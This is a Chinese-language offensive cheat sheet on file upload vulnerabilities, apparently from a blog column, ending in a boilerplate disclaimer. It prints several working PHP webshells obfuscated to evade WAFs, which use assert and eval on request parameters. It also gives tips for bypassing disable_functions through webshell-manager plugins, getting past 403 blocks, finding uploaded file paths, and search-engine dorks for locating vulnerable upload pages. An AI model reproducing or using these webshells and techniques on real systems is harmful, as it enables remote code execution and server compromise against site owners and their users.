-
文件上传漏洞
-
文件上传漏洞原理:未对用户提交的文件进行严格校验,就将恶意文件解析执行,导致用户可以提交恶意的文件进行攻击;
-
利用方式(危害):
1). 上传HTML/SVG
进行XSS
攻击,窃取Cookie
;(CSRF + XSS
)
2). 上传Webshell
文件Getshell
;(Webshell
文件:php
,asp
,jsp
等 )
3). 上传Docx
宏病毒文件,对数据进行 窃取和破坏; -
可能存在的文件上传的功能点(文资留商用)
1) . 文件编辑处 文件上传;
2) . 资料认证处 文件上传;
3) . 留言评论处 文件上传;
4) . 商品编辑处 文件上传;
5) . 用户信息处 文件上传;
-
绕过方式
-
文件上传绕WAF:免杀webshell
<?php
$a = substr_replace("assexx","rt",4);
$b=[''→$a($_POST['q'])];
?><?php
$a = $_GET['A'];
$b = $_POST['B'];
$a($b);
?><?php
$a ="a";
$s ="s";
$c=$a.$s."sert";
foreach(array('_GET') as $r){
foreach($$r as $k => $v){
$c($v);
}}
?># 参数名=phpinfo();
# <?php phpinfo();@Eval($_POST[1]);?>
# <? @eval($_POST[1]); ?>
-
其他
- 网站设置了 Disable_functions 如何进行绕过?
1). 作用:限制命令执行;
2). 绕过:蚁剑/哥斯拉上安装插件进行绕过; - 为什么上传了恶意文件,但连接不上 ?
1). 恶意文件内容有误;
2). 上传的恶意文件无法被解析;
3). 当前目录不能执行脚本文件;
4). 安全设备进行了拦截; - 为什么可以正常访问图片,但访问上传脚本显示403?
1). 当前目录不能执行脚本文件;
2). 安全设备进行了拦截; - 绕过403工具:
403ByPassser-master,X-Forwarded-For
插件 - 脚本上传后,如何找到其路径?
1). 上传页面F12查看源码;
2). Brup抓包,查看是否泄露了其上传路径;
3). 查看网站图片路径,试着修改文件名,看图片目录下是否存在上传文件;
4). 通过目录扫描寻找可疑的目录; - Google语法:
inurl:upload.php
,intitle="未选择文件"
- FOFA语法:
title="upload"
-
免责声明
-
本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。
-
本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。
-
本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。
-
读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。
-
本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。
-
作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。
敬请广大读者谅解。如有疑问,请联系我们。谢谢!